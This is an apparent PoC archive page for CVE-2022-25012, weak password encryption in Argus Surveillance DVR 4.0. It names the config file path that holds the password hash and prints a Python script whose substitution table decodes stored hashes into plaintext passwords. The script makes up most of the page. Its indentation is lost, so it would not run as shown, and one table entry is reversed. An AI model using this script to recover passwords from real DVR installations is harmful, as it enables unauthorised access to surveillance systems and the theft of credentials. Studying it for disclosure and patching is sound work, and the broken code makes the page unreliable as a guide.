关联漏洞
描述
Weak Password Encryption in Argus Surveillance DVR 4.0
介绍
# CVE-2022-25012
**Description:** Weak Password Encryption in Argus Surveillance DVR 4.0
**Vulnerable App:** [Download](https://www.exploit-db.com/apps/7c1bd445a15585d56f42f36a18696368-DVR_stp.exe)
**Exploit-DB:** [https://www.exploit-db.com/exploits/50130](https://www.exploit-db.com/exploits/50130)
**Proof Of Concept:**
`C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini` contains the password hash
```python
characters = {
'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5',
'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0',
'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E',
'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J',
'8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O',
'7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T',
'8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y','C9C4':'Z',
'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e',
'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',
'906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',
'7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',
'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'}
pass_hash = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4"
if (len(pass_hash)%4) != 0:
print("[!] Error, check your password hash")
exit()
split = []
n = 4
for index in range(0, len(pass_hash), n):
split.append(pass_hash[index : index + n])
for key in split:
if key in characters.keys():
print("[+] " + key + ":" + characters[key])
else:
print("[-] " + key + ":Unknown")
```
**Screenshots:**
文件快照
[4.0K] /data/pocs/694037ca51aeb78fc5915075c9bfbc7bc0a391ba
├── [1.1K] POC.py
└── [1.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。